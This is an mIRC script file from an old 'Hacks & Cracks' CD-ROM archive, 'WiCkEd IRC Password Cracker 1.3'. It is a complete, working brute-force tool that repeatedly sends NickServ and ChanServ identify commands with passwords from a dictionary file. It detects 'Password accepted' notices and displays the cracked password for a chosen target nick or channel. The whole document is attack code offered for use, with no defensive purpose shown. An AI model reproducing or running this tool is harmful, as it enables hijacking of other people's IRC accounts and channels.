home *** CD-ROM | disk | FTP | other *** search
/ Hacks & Cracks / Hacks_and_Cracks.iso / cracking software / irc password cracker.zip / CRACK.MRC next >
Text File  |  1998-08-16  |  6KB  |  106 lines

  1. ; *********************************************
  2. ; ** WiCkEd IRC Password Cracker 1.3 Addon   **
  3. ; ** By BEEFCAKE  <beefcake@thepentagon.com> **
  4. ; ** http://www.thepentagon.com/beefcake     **
  5. ; *********************************************
  6. ;
  7. ;
  8. ; Shout Outs to HaM|LToN5 ^brian^ and all the doods in
  9. ; #hacking on irc.webmaster.com
  10.  
  11. alias crack.nick {
  12. /msg nickserv identify %crack.nick $read -l $+ %crack.nick.line %crack.nick.dic 
  13. /inc %crack.nick.line 1
  14. if (%crack.nick.line > %crack.nick.max) { /echo 4 *** You have reached the end of your dictionary file, and none of the passwords worked. All variable have been reset. | /timer500 off | /unset crack.nic* | /disable #crack.nick }
  15. }
  16.  
  17. alias crack.chan {
  18. /msg chanserv identify %crack.chan $read -l $+ %crack.chan.line %crack.chan.dic 
  19. /inc %crack.chan.line 1
  20. if (%crack.chan.line > %crack.chan.max) { /echo 4 *** You have reached the end of your dictionary file, and none of the passwords worked. All variable have been reset. | /timer501 off | /unset crack.cha* | /disable #crack.chan }
  21. }
  22.  
  23. alias /crack.nick.start {
  24. if (%crack.nick == $null) { /echo 4 *** No Nick was entered -- Halted | /timer500 off | /halt }
  25. if (%crack.nick.line == $null) { /echo 4 *** No line was entered -- Halted | /timer500 off | /halt }
  26. if (%crack.nick.dic == $null) { /echo 4 *** No dictionary file was entered -- Halted | /halt | /timer500 off }
  27. if (%crack.nick.speed == $null) { /echo 4 *** No speed entered, defualting to 3. | set %crack.nick.speed 3 }
  28. if ($exists(%crack.nick.dic) == $false) { /echo 4 *** The dictionary file entered is not valid, this means that it dose not exist in the directory u specified. -- Halted | /halt }
  29. set %crack.nick.max $lines(%crack.nick.dic)
  30. /timer500 %crack.nick.max %crack.nick.speed /crack.nick 
  31. enable #crack.nick  
  32. /echo 4 *** Crack has been started, Cracking %crack.nick useing dictionary file %crack.nick.dic starting on line %crack.nick.line and timeout = %crack.nick.speed , please ignore the text that will follow.
  33. }
  34.  
  35. alias /crack.chan.start {
  36. if (%crack.chan == $null) { /echo 4 *** No Channel was entered -- Halted | /timer500 off | /halt }
  37. if (%crack.chan.line == $null) { /echo 4 *** No line was entered -- Halted | /timer500 off | /halt }
  38. if (%crack.chan.dic == $null) { /echo 4 *** No dictionary file was entered -- Halted | /timer500 off | /halt }
  39. if (%crack.chan.speed == $null) { set %crack.chan.speed 5 }
  40. if ($exists(%crack.chan.dic) == $false) { /echo 4 *** The dictionary file entered is not valid, this means that it dose not exist in the directory u specified. -- Halted | /halt }
  41. set %crack.chan.max $lines(%crack.chan.dic)
  42. /timer501 %crack.chan.max %crack.chan.speed /crack.chan
  43. enable #crack.chan 
  44. /echo 4 *** Crack has been started, Cracking %crack.chan useing dictionary file %crack.chan.dic starting on line %crack.chan.line and timeout = %crack.chan.speed , please ignore the text that will follow.
  45. }
  46.  
  47. menu status {
  48. Password Cracker
  49. .Nick Cracker
  50. ..Start: /crack.nick.start
  51. ..Pause: /timer500 off | /echo 4 *** The crack has been paused, your on line %crack.nick.line , none of the variables have been unset, hit Start to start again. | disable #crack.nick
  52. ..Stop: /timer500 off | /echo 4 ***  You ended on line %crack.nick.line incase u need to continue the crack later. | /unset %crack.nic* | /disable #crack.nick
  53. ..Simple Setup
  54. ...Set Nick: { set %crack.nick $$?="Nick To Crack" } | { set %crack.nick.dic c:\wicked\cracker\dic.txt } | { set %crack.nick.line 1 } | { set %crack.nick.speed 3 }
  55. ..Pro Setup 
  56. ...Set Nick: { set %crack.nick $$?="Nick To Crack" }
  57. ...Set Dic: { set %crack.nick.dic $dir="Dictionary File" c:\*.* }
  58. ...Set Line: { set %crack.nick.line $$?="Line of the dic file to start on" }
  59. ...Speed: { set %crack.nick.speed $$?="Pause between identifys?(3)" }
  60. ..Reset Crack: /unset %crack.nic* | /echo 4 *** All variables for the Nick Cracker have been reset.
  61. .Chan Cracker
  62. ..Start: /crack.chan.start
  63. ..Pause: /timer501 off | /echo 4 *** The crack has been paused, your on line %crack.chan.line , none of the variables have been unset, hit Start to start again. | disable #crack.chan
  64. ..Stop: /timer501 off | /echo 4 ***  You ended on line %crack.chan.line incase u need to continue the crack later. | /unset %crack.cha* | disable #crack.chan
  65. ..Simple Setup
  66. ...Set Chan: { set %crack.chan $$?="Channel To Crack(remember the #)" } | { set %crack.chan.dic c:\wicked\cracker\dic.txt } | { set %crack.chan.line 1 } | { set %crack.chan.speed 5 }
  67. ..Pro Setup 
  68. ...Set Chan: { set %crack.chan $$?="Channel To Crack(remember the #)" }
  69. ...Set Dic: { set %crack.chan.dic $dir="Dictionary File" c:\*.* }
  70. ...Set Line: { set %crack.chan.line $$?="Line of the dic file to start on" }
  71. ...Speed: { set %crack.chan.speed $$?="Pause between identifys?(5)" }
  72. ..Reset Crack: /unset %crack.cha* | /echo 4 *** All variables for the Channel Cracker have been reset.
  73. .Help:
  74. }
  75.  
  76.  
  77. #crack.nick off
  78. on 1:NOTICE:*Password accepted for $me *:*:/halt
  79. on 1:NOTICE:*That nick isn't registered*:*:/echo 4 *** The Nick you are cracking isn't registered. All the variables have been reset, and the crack stoped. | /timer500 off | /disable #crack.nick | /unset crack.nic*
  80. on 1:NOTICE:*Password accepted for*:*:{
  81. /timer500 off
  82. /clear
  83. /beep 
  84. /echo 4 *** A password was accepted for %crack.nick , the password is | /dec %crack.nick.line 1 | /echo 4 $read -l $+ %crack.nick.line %crack.nick.dic , Everything has been reset, u ended on | /inc %crack.nick.line 1 | /echo 4 line %crack.nick.line incase some thing went wrong. | disable #crack.nick
  85. /beep
  86. /unset %crack.nic*
  87. }
  88. #crack.nick end
  89.  
  90. #crack.chan off
  91. on 1:NOTICE:*That channel isn't registered*:*:/echo 4 *** The Channel you are cracking isn't registered. All the variables have been reset, and the crack stoped. | /timer501 off | /disable #crack.chan | /unset crack.cha*
  92. on 1:NOTICE:*Password accepted for channel*:*:{
  93. /timer501 off 
  94. /clear
  95. /beep
  96. /echo 4 *** A password was accepted for %crack.chan , the password is | /dec %crack.chan.line 1 | /echo 4 $read -l $+ %crack.chan.line %crack.chan.dic , Everything has been reset, u ended on | /inc %crack.chan.line 1 | /echo 4 line %crack.chan.line incase some thing went wrong. | disable #crack.chan
  97. /beep
  98. /unset %crack.cha*
  99. }
  100. #crack.chan end
  101.  
  102. on everyone:LOAD: {
  103. echo 4 BEEFY Inc's WiCkEd IRC password Cracker 1.3 By BEEFCAKE has been loaded.
  104. echo 4 http://www.thepentagon.com/beefcake  beefcake@thepentagon.com
  105. }
  106.